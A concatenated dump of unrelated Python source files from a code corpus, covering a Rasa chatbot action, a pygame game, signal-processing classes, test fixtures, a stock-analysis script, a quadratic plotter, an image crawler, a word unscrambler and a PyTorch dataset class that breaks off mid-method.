'\n# postNumber += 1\n#\n# # print(\"reply的結果: \"+reply);\n# else:\n# reply = \"\"\n # 慈 END\n \n #外部搜尋結果(URL)\n# resultpage = outerSearch(qkey, 10, 0)\n# for url in resultpage:\n# print(url)\n\n #外部搜尋\n #stackoverflow物件\n# stack_items = StackData.parseStackData(resultpage)\n ######假資料~~~~~\n \n #with open(\"DATA_test.json\", \"r\", encoding=\"utf-8\") as f:\n # stack_items = json.load(f)\n \n# raw_data = [\" \".join([item['question']['abstract'], \" \".join([ans['abstract'] for ans in item['answers']])]) for item in stack_items ]\n #取得block排名\n# result = TextAnalyze.blockRanking(stack_items, qkey)\n #print(result)\n# for i in stack_items:\n# i['question']['abstract'] = str(textAnalyzer.textSummarization(i['question']['abstract']))\n# for ans in i['answers']:\n# ans['abstract'] = str(textAnalyzer.textSummarization(ans['abstract']))\n#\n# temp_data_id_list = requests.post(head_url + 'insert_cache', json={'data' : stack_items, 'type' : \"temp_data\"})\n# block_rank_id = requests.post(head_url + 'insert_cache', json={'data': result, 'type' : \"blocks_rank\"})\n#\n# print(temp_data_id_list.text)\n# print(block_rank_id.text)\n# t_data_list = json.loads(temp_data_id_list.text)\n# blocks = json.loads(block_rank_id.text)\n\n #每篇title\n# result_title = [item['question']['title'] for item in stack_items]\n\n# reply += \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n# for i in range(0, len(t_data_list)):\n# reply += (\"
\" + str(i+1) + \".\" + result_title[i] + \"\")\n# reply += \"
點選摘要連結可顯示內容。
\"\n# reply += \"點我查看所有答案排名\"\n# reply += \"

是否要繼續搜尋?\"\n# dispatcher.utter_message(text=reply)\n \n # dispatcher.utter_message(text=\"是否繼續搜尋?\")\n \n # 慈 START\n # reply += \"

是否繼續搜尋?\"\n#dispatcher.utter_message(text=reply)\n # 慈 END\n\n# more_keywords = textAnalyzer.keywordExtraction(raw_data)\n# qkey = qkey + more_keywords\n #!!!將關鍵字及更多關鍵字存入slot\n dispatcher.utter_message(text=\"是否繼續搜尋?\")\n return [SlotSet(\"keywords\", ','.join(qkey))]\n \n \n \n#給user選關鍵字\nclass select_keyword(Action):\n def name(self) -> Text:\n return \"select_keyword\"\n def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n #!!!拿到之前存的關鍵字\n print(\"給使用者選關鍵字了!\")\n qkey = tracker.get_slot(\"keywords\")\n print(qkey)\n qkey = qkey.split(',')\n \n #------------test------------#\n #textAnalyzer = TextAnalyze.TextAnalyze()\n #more_keywords = textAnalyzer.keywordExtraction(eval(raw_data))\n #----------------------------#\n \n reply = '新增/刪除用來搜尋的關鍵字
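# list the stored keywords so the user can add or remove them before the next search\n        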
id = 0\n        reply = '新增/刪除用來搜尋的關鍵字<br>x'\n        id += 1\n        reply += '<br><br>'\n        \n        dispatcher.utter_message(text=reply)\n        return []\n    \n    \n\n# search with the selected keywords (continue searching)\nclass outer_search(Action):\n    def name(self) -> Text:\n        return \"outer_search\"\n    def run(self, dispatcher, tracker, domain) -> List[Dict[Text, Any]]:\n        # get the needed info and the user's last input\n        print(\"去外部搜尋了!\")\n        keywords = tracker.latest_message.get('text')\n        keywords = keywords.split(',',1)[1]\n        print(keywords)\n        \n        qkey = keywords.split(',')\n#        # external search results (URLs)\n#        resultpage = outerSearch(qkey, 10, 0)\n#        for url in resultpage:\n#            print(url)\n#        # external search\n#        # StackOverflow objects\n#        stack_items = StackData.parseStackData(resultpage)\n#\n#        # fake data ~~~~~\n#        #with open(\"DATA_test.json\", \"r\", encoding=\"utf-8\") as f:\n#        #    stack_items = json.load(f)\n#\n#        raw_data = [ \" \".join([item['question']['abstract'], \" \".join([ans['abstract'] for ans in item['answers']])]) for item in stack_items ]\n#        # get the block ranking\n#        result = TextAnalyze.blockRanking(stack_items, qkey)\n#        #print(result)\n#        temp_data_id_list = requests.post(head_url + 'insert_cache', json={'data' : stack_items[0:5], 'type' : \"temp_data\"})\n#        block_rank_id = requests.post(head_url + 'insert_cache', json={'data': result, 'type' : \"blocks_rank\"})\n#        print(temp_data_id_list.text)\n#        print(block_rank_id.text)\n#        t_data_list = json.loads(temp_data_id_list.text)\n#        blocks = json.loads(block_rank_id.text)\n#\n#        # the title of each post\n#        result_title = [item['question']['title'] for item in stack_items]\n        \n        reply = \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n#        reply += \"謝謝您的等待,以下為搜尋結果的資料摘要:\"\n#        for i in range(0, len(t_data_list)):\n#            reply += (\"<br>\" + str(i+1) + \".\" + result_title[i] + \"\")\n#            reply += \"<br>點選摘要連結可顯示內容。<br>\"\n#        reply += \"點我查看所有答案排名\"\n#        reply += \"<br><br>是否要繼續搜尋?\"\n        dispatcher.utter_message(text=reply)\n        \n        return []\n","sub_path":"models/rasa-demo/actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":17104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"587862422","text":"import os\r\nimport pygame\r\n\r\nfrom player import Ball\r\nfrom world import World, load_level\r\n\r\npygame.init()\r\nWIDTH, HEIGHT = 192, 192\r\nwin = pygame.display.set_mode((WIDTH, HEIGHT), pygame.NOFRAME)\r\npygame.display.set_caption('Bounce')\r\n\r\nclock = pygame.time.Clock()\r\nFPS = 30\r\n\r\n# GAME VARIABLES **************************************************************\r\nROWS = 12\r\nMAX_COLS = 150\r\nTILE_SIZE = 16\r\n\r\n# COLORS **********************************************************************\r\n\r\nBLUE = (175, 207, 240)\r\n\r\n# GROUPS **********************************************************************\r\n\r\nspikes_group = pygame.sprite.Group()\r\ninflator_group = pygame.sprite.Group()\r\ndeflator_group = pygame.sprite.Group()\r\n\r\n\r\nobjects_groups = [spikes_group, inflator_group, deflator_group]\r\ncollision_groups = [inflator_group, deflator_group]\r\n\r\n# RESET ***********************************************************************\r\n\r\nlevel = 1\r\n\r\ndef reset_level(level):\r\n\tspikes_group.empty()\r\n\tinflator_group.empty()\r\n\tdeflator_group.empty()\r\n\r\n\t# LOAD LEVEL WORLD\r\n\r\n\tworld_data, level_length = load_level(level)\r\n\tw = World(objects_groups)\r\n\tw.generate_world(world_data, win)\r\n\r\n\treturn world_data, level_length, w\r\n\r\ndef reset_player():\r\n\tp = Ball(WIDTH//2, 50)\r\n\tmoving_left = False\r\n\tmoving_right = False\r\n\r\n\treturn p, moving_left, moving_right\r\n\r\nworld_data, level_length, w = reset_level(level)\r\np, moving_left, moving_right = reset_player()\r\n\r\n# VARIABLES *******************************************************************\r\n\r\nmoving_left = False\r\nmoving_right = False\r\nscreen_scroll = 0\r\nlevel_scroll = 0\r\nSCROLL_THRES = 80\r\n\r\nrunning = True\r\nwhile running:\r\n\twin.fill(BLUE)\r\n\r\n\r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\trunning = False\r\n\r\n\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\tif event.key == pygame.K_ESCAPE or \\\r\n\t\t\t\tevent.key == pygame.K_q:\r\n\t\t\t\trunning = False\r\n\r\n\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\tmoving_left = True\r\n\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\tmoving_right = True\r\n\t\t\tif event.key == pygame.K_UP:\r\n\t\t\t\tif not p.jump:\r\n\t\t\t\t\tp.jump = True\r\n\r\n\t\tif event.type == pygame.KEYUP:\r\n\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\tmoving_left = False\r\n\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\tmoving_right = False\r\n\r\n\tw.draw_world(win, screen_scroll)\r\n\r\n\tspikes_group.update(screen_scroll)\r\n\tspikes_group.draw(win)\r\n\tinflator_group.update(screen_scroll)\r\n\tinflator_group.draw(win)\r\n\tdeflator_group.update(screen_scroll)\r\n\tdeflator_group.draw(win)\r\n\r\n\tscreen_scroll = 0\r\n\tp.update(moving_left, moving_right, w, collision_groups)\r\n\tp.draw(win)\r\n\r\n\tif ((p.rect.right >= WIDTH - SCROLL_THRES) and level_scroll < (level_length * 16) - WIDTH) \\\r\n\t\t\tor ((p.rect.left <= SCROLL_THRES) and level_scroll > 0):\r\n\t\t\tdx = p.dx\r\n\t\t\tp.rect.x -= dx\r\n\t\t\tscreen_scroll = -dx\r\n\t\t\tlevel_scroll += dx\r\n\r\n\tif pygame.sprite.spritecollide(p, spikes_group, 
False):\r\n\t\tworld_data, level_length, w = reset_level(level)\r\n\t\tp, moving_left, moving_right = reset_player()\r\n\t\tscreen_scroll = 0\r\n\t\tlevel_scroll = 0\r\n\r\n\r\n\tpygame.draw.rect(win, (255, 255,255), (0, 0, WIDTH, HEIGHT), 2, border_radius=5)\r\n\tclock.tick(FPS)\r\n\tpygame.display.update()\r\n\r\npygame.quit()","sub_path":"Bounce/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"555431374","text":"# -*- coding: utf-8 -*-\n\"\"\"The Event class.\"\"\"\nfrom sys import modules\nfrom typing import List\nfrom typing import Union\n\nimport csdmpy as cp\nfrom pydantic import BaseModel\n\nfrom ._base import AbstractOperation\n\n__author__ = \"Maxwell C. Venetos\"\n__email__ = \"maxvenetos@gmail.com\"\n\n\nclass SignalProcessor(BaseModel):\n \"\"\"\n Signal processing class to apply a series of operations to the dependent variables\n of the simulation dataset.\n\n Attributes\n ----------\n\n operations: List\n A list of operations.\n\n Examples\n --------\n\n >>> post_sim = SignalProcessor(operations=[o1, o2]) # doctest: +SKIP\n \"\"\"\n\n processed_data: cp.CSDM = None\n operations: List[AbstractOperation] = []\n\n class Config:\n validate_assignment = True\n arbitrary_types_allowed = True\n\n @classmethod\n def parse_dict_with_units(self, py_dict):\n \"\"\"Parse a list of operations dictionary to a SignalProcessor class object.\n\n Args:\n pt_dict: A python dict object.\n \"\"\"\n lst = []\n for op in py_dict[\"operations\"]:\n if \"type\" in op.keys():\n lst.append(\n getattr(\n getattr(modules[__name__], op[\"function\"]), op[\"type\"]\n ).parse_dict_with_units(op)\n )\n else:\n lst.append(\n getattr(modules[__name__], op[\"function\"]).parse_dict_with_units(op)\n )\n return SignalProcessor(operations=lst)\n\n def json(self):\n \"\"\"\n Serialize the SignalProcessor object to a JSON compliant python dictionary\n object, where physical quantities are represented as string with a value and a\n unit.\n\n Returns:\n A Dict object.\n \"\"\"\n lst = []\n for i in self.operations:\n lst += [i.json()]\n op = {}\n\n op[\"operations\"] = lst\n return op\n\n def apply_operations(self, data, **kwargs):\n \"\"\"\n Function to apply all the operation functions in the operations member of a\n SignalProcessor object. Operations applied sequentially over the data member.\n\n Returns:\n CSDM object: A copy of the data member with the operations applied to it.\n \"\"\"\n if not isinstance(data, cp.CSDM):\n raise ValueError(\"The data must be a CSDM object.\")\n # copy_data = data.copy()\n for filters in self.operations:\n data = filters.operate(data)\n self.processed_data = data\n\n return data\n\n\nclass Scale(AbstractOperation):\n \"\"\"\n Scale the amplitudes of all dependent variables from a CSDM object.\n\n Args:\n float factor: The scaling factor. The default value is 1.\n\n Example\n -------\n\n >>> import mrsimulator.signal_processing as sp\n >>> operation1 = sp.Scale(factor=20)\n \"\"\"\n\n factor: float = 1\n\n def operate(self, data):\n r\"\"\"Applies the operation for which the class is named for.\n\n .. 
math::\n f(\\vec(x)) = scale*\\vec(x)\n\n Args:\n data: CSDM object\n \"\"\"\n data *= self.factor\n return data\n\n\nclass IFFT(AbstractOperation):\n \"\"\"\n Apply an inverse Fourier transform on all dependent variables of the CSDM object.\n\n Args:\n int dim_index: Dimension index along which the function is applied.\n\n Example\n -------\n\n >>> operation2 = sp.IFFT(dim_index=0)\n \"\"\"\n\n dim_index: Union[int, list, tuple] = 0\n\n def operate(self, data):\n \"\"\"Applies the operation for which the class is named for.\n\n Args:\n data: CSDM object\n \"\"\"\n dim_index = self.dim_index\n if isinstance(dim_index, int):\n dim_index = [dim_index]\n\n for i in dim_index:\n data = data.fft(axis=i)\n return data\n\n\nclass FFT(IFFT):\n \"\"\"\n Apply a forward Fourier transform on all dependent variables of the CSDM object.\n\n Args:\n int dim_index: Dimension index along which the function is applied.\n\n Example\n -------\n\n >>> operation3 = sp.FFT(dim_index=0)\n \"\"\"\n\n\nclass complex_conjugate(AbstractOperation):\n pass\n","sub_path":"src/mrsimulator/signal_processing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"422018896","text":"from selenium import webdriver\nimport time\nimport pytest\n\n\n@pytest.yield_fixture(scope=\"class\")\ndef start_browser():\n baseURL = \"https://invoice-mail.cisbox.com/admin/login\"\n driver = webdriver.Chrome()\n driver.maximize_window()\n driver.implicitly_wait(5)\n driver.get(baseURL)\n yield driver\n","sub_path":"utilities/start_browser.py","file_name":"start_browser.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"510157979","text":"# Filename : functions.py\n# Date : 2018/9/28\nfrom datetime import datetime\nimport random\n\n\ndef get_order_sn():\n\tsn = ''\n\ts = '1234567890qwertyuiopasdfghjklzxcvbnm'\n\tfor i in range(10):\n\t\tsn += random.choice(s)\n\tsn += datetime.now().strftime('%Y%m%d%H%M%S')\n\treturn sn","sub_path":"django_cart/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"570049281","text":"import z\nimport rows\nimport queue\nimport buy\nimport sliding\nimport statistics\n\ndebug = None\nif debug:\n print (\"debugging {}\".format(debug))\n\nstart = 60\neach = 10\nistart = -1*start\nreq = start - 20\ndates = z.getp(\"dates\")\nque = 12\nmodme = start - que + 1\niterations = 14\nfirstdate = dates[istart*iterations]\nprint(\"firstdate : {}\".format( firstdate ))\n\ndef proc(astock):\n closes = sliding.WindowQueue(que)\n lows = sliding.WindowQueue(que, needMin=True)\n mins = list()\n answers = list()\n prevbuy = None\n bought = None\n boughts = list()\n boughts_avgs = list()\n c_close = None\n dailys = list() \n\n citerations = iterations\n myfirstdate = firstdate\n\n # grab a first date that mods into 60\n for i, row in enumerate(rows.getRowsRange(astock, count = 2, date=myfirstdate)):\n pass\n mydate = row['Date']\n while mydate != myfirstdate and citerations > 5:\n citerations -= 1\n myfirstdate = dates[istart*citerations]\n for i, row in enumerate(rows.getRowsRange(astock, count = 2, date=myfirstdate)):\n pass\n mydate = row['Date']\n\n if mydate != myfirstdate:\n return \"NA\", \"NA\", \"NA\", \"NA\", \"NA\"\n\n for i, row in enumerate(buy.getRows(astock, 
myfirstdate)):\n try:\n c_low = float(row['Low'])\n except:\n print(\"no low? astock: {}\".format( astock))\n return \"NA\", \"NA\", \"NA\", \"NA\", \"NA\"\n\n date = row['Date']\n\n if c_close and c_close > c_low:\n daily_low = round(c_low/c_close,3)\n dailys.append(daily_low)\n\n c_close = float(row[z.closekey])\n\n closes.add_tail(c_close)\n lows.add_tail(min(c_low, c_close))\n if bought == False and (c_low < prevbuy or c_close < prevbuy):\n# print(\"date {} buytgt : {} c_low: {} \".format( date, prevbuy, c_low ))\n bought = True\n\n if closes.full():\n first_close = closes.get()\n lowest = lows.get_minimum()\n chg = round(lowest / first_close,3)\n if chg <= 1:\n mins.append(chg)\n else:\n print (\"HUH!?!?!?!\")\n exit()\n\n lenmins = len(mins)\n# if debug:\n# print(\"{}, lenmins : {} {}\".format( i, lenmins , date))\n if lenmins and not lenmins % modme:\n med_15 = statistics.median(mins)\n means = statistics.mean(mins)\n useme = round(min((med_15 , means)),3)\n tgt_15 = round(useme * c_close,2)\n answers.append((useme, tgt_15))\n \n candrop = round(tgt_15/c_close,3)\n\n if bought == True:\n boughts.append(1)\n if debug:\n print(\"yes {} \".format(date))\n boughts_avgs.append(candrop)\n elif bought == False:\n boughts.append(0)\n if debug:\n print(\"no {} \".format(date))\n boughts_avgs.append(candrop)\n\n if debug:\n print(\"date {} cprice {} {} buytarget:{} can it drop {}\".format(date, c_close, \"bought\" if bought else \"nope\", tgt_15, z.percentage(candrop)))\n\n bought = False\n prevbuy = tgt_15\n closes.clear()\n lows.clear()\n mins = list()\n\n# if len(mins) >= req:\n# med_15 = statistics.median(mins)\n# means = statistics.mean(mins)\n# useme = (med_15 + means) /2\n# tgt_15 = round(useme * c_close,2)\n often = \"NA\"\n try:\n adl = round((statistics.mean(dailys) + statistics.median(dailys))/2,3)\n except:\n adl = \"NA\"\n\n if debug:\n print(\"boughts: {}\".format( boughts))\n print(\"boughts_avgs: {}\".format( boughts_avgs))\n\n if len(boughts) >= 5:\n often = round(statistics.mean(boughts),3)\n\n try:\n avgtgt = round(statistics.mean(boughts_avgs) ,3)\n tgt9 = answers[-1][1]\n med9 = answers[-1][0]\n return med9, tgt9, often, adl, avgtgt\n except:\n print(\"astock: {}\".format( astock))\n return \"NA\", \"NA\", \"NA\", \"NA\", \"NA\"\n\n\ndef procs():\n stocks = [debug.upper()] if debug else z.getp(\"listofstocks\")\n low_target = dict()\n for astock in stocks:\n try:\n low_target[astock] = proc(astock)\n except Exception as e:\n z.trace(e)\n pass\n try:\n print(\"low_target: {}\".format( low_target))\n print(\" med9, tgt9, often, adl, avgtgt\")\n except:\n pass\n if not debug:\n z.setp( low_target, \"low_target\")\n\nif __name__ == '__main__':\n procs()\n","sub_path":"python/zen/drop_finder2.py","file_name":"drop_finder2.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"580661264","text":"from django.test import TestCase\nfrom ml.classifiers import ClassifierFactory\nfrom ml.tests.util import create_sample_dataset\nfrom ml.vectorizers import VectorizerFactory\n\n\nclass BaseClassifierTestCase(TestCase):\n def setUp(self):\n self.dataset_definition, self.dataset, self.target_attribute = create_sample_dataset()\n self.vectorizer = VectorizerFactory.build_vectorizer(self.dataset, self.target_attribute)\n self.classifier, self.metrics = ClassifierFactory.build_binary_random_forest_classifier(\n self.dataset, self.target_attribute, self.vectorizer\n )\n\n def 
test_class_labels(self):\n class_labels = self.classifier.class_labels\n self.assertIn('True', class_labels)\n self.assertIn('False', class_labels)\n\n def test_is_binary(self):\n self.assertTrue(self.classifier.is_binary)\n\n def test_predict_instances(self):\n instances = self.dataset.instances.all()[0:100]\n predictions = list(self.classifier.predict_instances(instances))\n\n [self.assertLessEqual(prediction, 1.0) for prediction in predictions]\n [self.assertGreaterEqual(prediction, 0.0) for prediction in predictions]\n\n def test_predict_records(self):\n instances = self.dataset.instances.all()[0:100]\n records = [instance.instance for instance in instances]\n predictions = list(self.classifier.predict_records(records))\n\n [self.assertLessEqual(prediction, 1.0) for prediction in predictions]\n [self.assertGreaterEqual(prediction, 0.0) for prediction in predictions]\n\n def test_predict_vectors(self):\n instances = self.dataset.instances.all()[0:100]\n vectors = self.vectorizer.vectorize_instances(instances)\n\n predictions = list(self.classifier.predict_vectors(vectors))\n\n self.assertEqual(len(predictions), 100)\n\n [self.assertLessEqual(prediction, 1.0) for prediction in predictions]\n [self.assertGreaterEqual(prediction, 0.0) for prediction in predictions]\n\n def test_feature_importance(self):\n feature_importances = self.classifier.feature_importances\n self.assertIn('second_boolean_attribute=True', feature_importances)\n\n def test_metrics(self):\n self.assertLessEqual(self.metrics.auc, 1.0)\n self.assertGreaterEqual(self.metrics.auc, 0.0)\n self.assertLessEqual(self.metrics.accuracy, 1.0)\n self.assertGreaterEqual(self.metrics.accuracy, 0.0)\n\n\n\n\n","sub_path":"ml/tests/test_classifiers.py","file_name":"test_classifiers.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"589674404","text":"from pynput.keyboard import Key, Listener, KeyCode\nimport keyboard\n# def key_pressed(key):\n# print(\"Pressed {}\".format(key))\n \n# def key_released(key):\n# # print(\"Released {}\".format('key'))\n# print(\"*\",end='')\n# if key == Key.esc:\n# return False\n \n# # with Listener(on_press = key_pressed,\\\n# # on_release=key_released) as listener:\n# # listener.join()\n# with Listener(on_release=key_released) as listener:\n# listener.join()\nimport curses\nimport os\n\ndef main(win):\n win.nodelay(True)\n key=\"\"\n win.clear() \n win.addstr(\"Detected key:\")\n while 1: \n try: \n key = win.getkey() \n win.clear() \n win.addstr(\"Detected key:\")\n win.addstr(str(key)) \n if key == os.linesep:\n break \n except Exception as e:\n # No input \n pass \ncurses.wrapper(main)","sub_path":"Lect/나만의단축키만들기/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"653193060","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plt \nimport numpy as np\nimport math \na = float(input(\"a: \"))\nb = float(input(\"b: \"))\nc = float(input(\"c: \"))\nd = (b*b)-(4*a*c)\nprint(\"delta = %.2f\" % (d))\n\n#roots\nif (d>0):\n x1 = ((-1*b)-math.sqrt(d))/(2*a)\n x2 = ((-1*b)+math.sqrt(d))/(2*a)\n if (x1>x2):\n x1,x2=x2,x1\n plt.scatter(x1,0, color=\"blue\", label=\"$x_1$ = %.2f\" % (x1))\n plt.scatter(x2,0, color=\"blue\", label=\"$x_2$ = %.2f\" % (x2))\n #axis x limit \n plt.xlim(x1-5, x2+5)\nelif (d==0):\n x0 = ((-1)*b)/(2*a)\n plt.scatter(x0, 0, color=\"blue\", label=\"$x_0$ = %.2f\" % (x0))\n 
plt.xlim(-10, 10)\nelse:\n print(\"roots = {}\")\n\nplt.title('$\\mathit{f(x) = x^2 + bx + c}$')\n\n# vertex\n[p, q] = [(-1*b)/(2*a), (-1*d)/(4*a)]\nplt.scatter(p,q, color=\"green\", label=\"vertex [%.2f,%.2f]\" % (p,q))\n\n#f(x)\nx=np.arange(-100, 100,0.01)\ny=(a*x**2)+(b*x)+c\n\naxlines_style = (0, (5, 0.75))\n#x=0, y=0 axes\nplt.axhline(y=0, color=\"black\", linestyle=axlines_style)\nplt.axvline(x=0, color=\"black\", linestyle=axlines_style)\nplt.xlabel('x')\nplt.ylabel('y')\n#axis y limit\nif q<0:\n plt.ylim(q-5, (-0.5*q))\nelse:\n plt.ylim((-0.5*q), q+5)\nplt.plot(x,y, color='red', label=\"f(x) = %.2f$x^2$ + %.2fx + %.2f\" % (a,b,c))\nplt.legend()\nplt.show()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"232986664","text":"from google_images_download import google_images_download\r\nimport ssl\r\nssl._create_default_https_context = ssl._create_unverified_context\r\n\r\ndef imageCrawling(keyword, dir):\r\n response = google_images_download.googleimagesdownload()\r\n arguments = {\"keywords\":keyword,\r\n \"limit\":100,\r\n \"print_urls\":True,\r\n \"no_directory\":True,\r\n \"output_directory\":dir}\r\n paths= response.download(arguments)\r\n print(paths)\r\n\r\nimageCrawling(\"모네\",\"D:\\pycharm\\Second_Semester\\crawling\\ temp\")\r\n","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"229585228","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n# pylint: disable=invalid-name\r\n\r\n\"\"\"\r\nAutomate unscrambling words to cheat at sextuple.\r\nhttps://apps.apple.com/us/app/sextuple-word-lite/id291026377\r\nAugust 2019 mlf\r\n\r\nTODO: sort in order of first 6 letter word\r\n\"\"\"\r\n\r\nimport sys\r\nimport itertools\r\n\r\n\r\ndef unscramble(scrambled_word, target_length, dictionary):\r\n \"\"\"\r\n Return a sorted list of words that are in the dictionary and have\r\n length == target_length.\r\n\r\n :param scrambled_word: (str) the word to unscramble.\r\n :param target_length: (int) length of words to consider in the dictionary.\r\n This value is passed to itertools.permutations().\r\n :param dictionary: (set) list of english words to each check candidate word against.\r\n (NOTE: This is an actual dictionary, not the Python data structure.)\r\n :returns : (list) sorted list of words that meet the length criteria.\r\n \"\"\"\r\n word_list = set()\r\n for letters in itertools.permutations(scrambled_word, r=target_length):\r\n # this join is necessary because itertools.permutations returns a tuple\r\n # like this: ('a', 'b', 'c')\r\n candidate = ''.join(letters)\r\n if candidate in dictionary:\r\n word_list.add(candidate)\r\n return sorted(word_list)\r\n\r\n\r\ndef test():\r\n # simple positive test\r\n assert unscramble('tra', 3, {'art', 'rat', 'tar'}) == ['art', 'rat', 'tar']\r\n\r\n # ignore unrelated words in dictionary\r\n assert unscramble('tra', 3, {'art', 'arts', 'rat', 'rats', 'star', 'tar', 'tars'}) == ['art', 'rat', 'tar']\r\n\r\n # word (\"art\") not in dictionary\r\n assert unscramble('tra', 3, {'rat', 'tar'}) == ['rat', 'tar']\r\n\r\n # negative test - wrong target length, expect empty set\r\n assert unscramble('tra', 4, {'art', 'rat', 'tar'}) == []\r\n print('All tests passed')\r\n\r\n # negative test - empty dictionary, expect empty set\r\n assert unscramble('tra', 4, 
{}) == []\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n Main function\r\n - Read dictionary file(s), call unscramble, and print the list of matching words.\r\n :return: 0 on success or 1 on error\r\n \"\"\"\r\n if len(sys.argv) < 2:\r\n print('Please provide a six letter word to unscramble.')\r\n return 1\r\n\r\n scrambled_word = sys.argv[1]\r\n if len(scrambled_word) != 6:\r\n print('The scrambled word must be exactly six letters long.')\r\n return 1\r\n\r\n # primary dictionary\r\n with open('linuxwords.txt', 'r') as f:\r\n # this is a set comprehension\r\n dictionary = {line.rstrip('\\n') for line in f}\r\n\r\n # also use supplemental dictionary if exists\r\n try:\r\n with open('morewords.txt', 'r') as f:\r\n # this is a set comprehension union with the primary dictionary\r\n dictionary |= {line.rstrip('\\n') for line in f}\r\n except FileNotFoundError:\r\n pass\r\n\r\n # reversed range to print highest value (longest) words first\r\n for length in [6, 5, 4, 3]: # reversed(range(3, 7))\r\n unscrambled_words = unscramble(scrambled_word, length, dictionary)\r\n if unscrambled_words:\r\n print(\"{} letter words\".format(length))\r\n for word in unscrambled_words:\r\n print(word)\r\n else:\r\n print(\"There are no {} letter words\".format(length))\r\n\r\n return 0\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n sys.exit(main())\r\n","sub_path":"unscramble.py","file_name":"unscramble.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"331209893","text":"import os\nfrom .bigtiff import Bigtiff, SpatialMap, BigtiffDataset\nimport json\nimport torch\nimport math\nimport numpy as np\n\nclass STACCarribeanDataset(BigtiffDataset):\n \"\"\"\n Pytorch Dataset for Open AI Carribean Challenge\n Loads TIFF patches and corresponding bounding boxes and labels.\n \"\"\"\n \n _root = r\".\\openai-challenge\\data\"\n _config = {\n \"colombia\" : [\"borde_rural\", \"borde_soacha\"],\n \"guatemala\": [\"mixco_1_and_ebenezer\", \"mixco_3\"],\n # \"st_lucia\" : [\"casteries\", \"dennery\", \"gros_islet\"]\n \"st_lucia\" : [\"dennery\"]\n }\n _classes = [\"concrete_cement\", \n \"healthy_metal\",\n \"incomplete\", \n \"irregular_metal\", \n \"other\"]\n \n # --------------------------------------------------------------------------\n def __init__(self, dataset=\"colombia\", train=True, transform=None):\n \n # Set internal parameters:\n self.Train = train\n self.Name = dataset\n self.Transform = transform\n \n # Load images and instantiate super class:\n images = self.load_images()\n self.GroundTruth = self.load_groundtruth(images)\n \n # Assign patch sizes to bigtiffs based on maximum ROI size:\n self.PatchSize = self.set_patchsize(images)\n stride = [int(p/2) for p in self.PatchSize]\n \n # Sampling policy:\n sampleSet = self.createSamples(images, stride)\n super(STACCarribeanDataset, self).__init__(images, samples=sampleSet)\n \n # Filter samples to the ones that only contain ROIs:\n sampleSet = self.filterSamples(sampleSet)\n self._set_sampling_scheme_(sampleSet)\n \n # --------------------------------------------------------------------------\n def get_classes(self):\n return self._classes\n \n # --------------------------------------------------------------------------\n def __getitem__(self, index):\n # Overloading super class method to only return the first 3 (RGB) \n # channels of the patch.\n \n patch, rois = super().__getitem__(index)\n patch = patch[:,:,:-1]\n \n # Transform the image if applicable:\n if not 
self.Transform is None:\n # Get patch origin to convert ROI coordinates to patch coordinates.\n patch_origin = self.Samples[index, 1:]\n patch_origin = np.tile(patch_origin, 2)\n rois[:,:4] = rois[:,:4] - patch_origin\n \n # Transform:\n outputs = self.Transform({'image': patch, 'ROI': rois})\n patch = outputs['image']\n rois = outputs['ROI']\n \n \"\"\"\n # Convert them back to global image coordinates:\n if torch.is_tensor(rois):\n rois = rois + torch.from_numpy(patch_origin)\n elif type(rois) is numpy.ndarray:\n rois = rois + patch_origin\n else:\n raise TypeError('Must be numpy array or torch tensor.')\n \"\"\"\n \n return patch, rois, index\n \n # --------------------------------------------------------------------------\n def __getrois__(self, index):\n \n # Get the sample patch at specified index:\n sample = self.Samples[index]\n \n # From the list of available ROIs, identify the ones that lie inside \n # this patch:\n regions = list(self.BigTIFFs.keys())\n sample_region = regions[sample[0]]\n btif = self.BigTIFFs[sample_region]\n patch_origin = sample[1:]\n patch_end = patch_origin + btif.PatchSize[btif.DirectoryID] - 1\n \n rois = self.GroundTruth[sample_region]['ROI']\n \n if rois.size != 0:\n inside = ((rois[:,0] >= patch_origin[0]) &\n (rois[:,2] <= patch_end[0]) &\n (rois[:,1] >= patch_origin[1]) &\n 